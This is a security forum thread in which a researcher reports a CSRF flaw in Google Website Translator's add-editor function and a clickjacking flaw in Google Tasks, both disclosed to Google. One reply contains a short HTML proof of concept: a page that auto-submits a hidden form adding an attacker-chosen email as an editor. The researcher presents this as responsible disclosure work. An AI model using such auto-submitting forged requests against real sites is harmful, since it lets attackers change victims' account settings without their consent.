Results 1 to 3 of 3

Thread: Google Website Translator (Add Editor) CSRF and Google Tasks (Add Task) Clickjacking Share/Save - My123World.Com!

  1. #1
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2

    Google Website Translator (Add Editor) CSRF and Google Tasks (Add Task) Clickjacking

    Hello All,

    Here are POCs for two issues I found in different Google products back in late 2012.





    Google Website Translator (Add Editor) CSRF





    Google Tasks (Add Task) Clickjacking




    Originally posted on my blog : Security.log: Google Website Translator (Add Editor) CSRF and Google Tasks Clickjacking
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  2. #2
    Nice find mate , can you please share your HTML poc of CSRF.
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  3. #3
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2
    Hey Sandeep,

    Here's the POC I sent to Google a while back, should be fixed.

    <html>
    <head></head>
    <body onload=document.getElementById('csrf').submit()>
    <form id='csrf' action="http://translate.google.com/manager/website/editors" method="POST">
    <input type="hidden" name="new" value="prakhar@gmail.com"></input>
    </form>
    </body>
    </html>
    Hacking Wacking Sab Moh Maya Hai
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •